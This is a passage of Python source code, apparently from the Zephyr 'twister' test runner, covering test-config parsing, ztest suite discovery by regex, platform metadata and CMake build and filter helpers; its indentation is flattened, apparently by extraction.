# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
            for this test. Each key in this dictionary is a key that may
            be specified; if the .yaml file contains a key that is not listed
            here, an error is generated. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
                    whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
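# A minimal usage sketch for TwisterConfigParser, assuming a testcase.yaml that
# defines a test named "kernel.common" and reusing the schema and valid-key
# table defined on TestPlan further below:
#
#     parser = TwisterConfigParser("testcase.yaml", TestPlan.ts_schema)
#     parser.load()
#     test = parser.get_test("kernel.common", TestPlan.testsuite_valid_keys)
#     print(test["timeout"], test["tags"])
#
# Keys present in both the "common" and per-test sections are merged: string
# values are concatenated with a space, except "filter", which is combined as
# "(common) and (test)".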
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestSuite.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
def __init__(self, name=None, testsuite=None):
self.duration = 0
self.name = name
self.status = None
self.reason = None
self.testsuite = testsuite
self.output = ""
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<TestCase %s with %s>" % (self.name, self.status)
def __str__(self):
return self.name
class TestSuite(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testsuite_root, workdir, name):
"""TestSuite constructor.
This gets called by TestPlan as it finds and reads test yaml files.
Multiple TestSuite instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testsuite_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testsuite_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
        define one test, this can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.testcases = []
self.name = self.get_unique(testsuite_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.platform_type = []
self.toolchain_exclude = None
self.toolchain_allow = None
self.ts_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
def add_testcase(self, name):
tc = TestCase(name=name, testsuite=self)
self.testcases.append(tc)
@staticmethod
def get_unique(testsuite_root, workdir, name):
canonical_testsuite_root = os.path.realpath(testsuite_root)
if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testsuite_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testsuite_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
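    # Example of the naming scheme enforced above, with hypothetical paths:
    #
    #     TestSuite.get_unique("/src/zephyr/tests", "kernel/common", "kernel.common")
    #     # -> "tests/kernel/common/kernel.common"   (root lies inside ZEPHYR_BASE)
    #
    # For a testsuite root outside ZEPHYR_BASE the result is simply
    # "<workdir>/<name>", and any name without a "category.subsystem" dot is
    # rejected with a TwisterException.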
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
            # Do not match until end-of-line, otherwise we would not allow the
            # testcase regex in _find_regular_ztest_testcases() to catch suites
            # declared on the same line, as we only search starting at the end
            # of this match.
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
        Find regular ztest testcases like "ztest_unit_test" or similar. Return
        the testcase names and any warnings that were found.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
        Find new-style ztest testcases declared with "ZTEST" or "ZTEST_F". Return
        the testcase names and any warnings that were found.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
        Parse the search area and try to find testcases matching the
        testcase_regex argument. Return the testcase names and any warnings
        that were found.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
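    # Illustrative example of what the scanning helpers above extract from a
    # hypothetical source line:
    #
    #     ZTEST(kernel_common, test_timeout_order)
    #
    # _find_new_ztest_testcases() reports the testcase name "timeout_order"
    # (the leading "test_" is stripped); a name that does not start with
    # "test_" only produces a warning. The suite name list itself comes from
    # ZTEST_SUITE()/ztest_test_suite() declarations matched in scan_file().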
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
# if testcases are provided as part of the yaml, skip this step.
if not self.testcases:
# only add each testcase once
for sub in set(subcases):
name = "{}.{}".format(self.id, sub)
self.add_testcase(name)
if not subcases:
self.add_testcase(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
        Try to find the src directory containing the test source code. For
        optimization reasons it is sometimes placed in the parent directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
@param test The TestSuite object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# Fix an issue with copying objects from testsuite, need better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
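    # A minimal sketch of the run id scheme above, with a hypothetical name:
    #
    #     h = hashlib.md5("native_posix/tests/kernel/common/kernel.common".encode())
    #     h.update(f"{random.getrandbits(64)}".encode())
    #     run_id = h.hexdigest()   # 32 hex characters, different on every run
    #
    # The random suffix makes the id unique per invocation, while hashing the
    # instance name keeps the format and length stable.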
def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
        # Right now we only support building on Windows; running tests there
        # is still a work in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testsuite.build_only:
return False
# Do not run slow tests:
skip_slow = self.testsuite.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testsuite.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testsuite.extra_configs:
content = "\n".join(self.testsuite.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testsuite_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
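    # Example of the overlay produced above for a native platform listed in
    # coverage_platform with ASan enabled (contents are illustrative):
    #
    #     CONFIG_COVERAGE=y
    #     CONFIG_COVERAGE_DUMP=y
    #     CONFIG_ASAN=y
    #
    # The file is written to <build_dir>/twister/testsuite_extra.conf and later
    # picked up by ProjectBuilder.cmake(), which appends it to OVERLAY_CONFIG.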
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testsuite.extra_sections)
def __repr__(self):
return "<TestSuite %s on %s>" % (self.testsuite.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testsuite, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testsuite = testsuite
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
if not self.instance.run:
self.instance.add_missing_testscases("skipped", "Test was built only")
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if overflow_found and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(overflow_found[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
for tc in self.instance.testcases:
tc.status = self.instance.status
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
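    # Illustrative example of the ANSI stripping performed above; the escape
    # sequences are hypothetical but typical of colorized make/cmake output:
    #
    #     raw = "\x1b[32mFinished\x1b[0m running script.cmake"
    #     ansi_escape.sub('', raw)   # -> "Finished running script.cmake"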
class FilterBuilder(CMake):
def __init__(self, testsuite, platform, source_dir, build_dir):
super().__init__(testsuite, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testsuite and self.testsuite.ts_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testsuite.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testsuite.name): True}
else:
return {os.path.join(self.platform.name, self.testsuite.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, tplan, instance, **kwargs):
super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
self.log = "build.log"
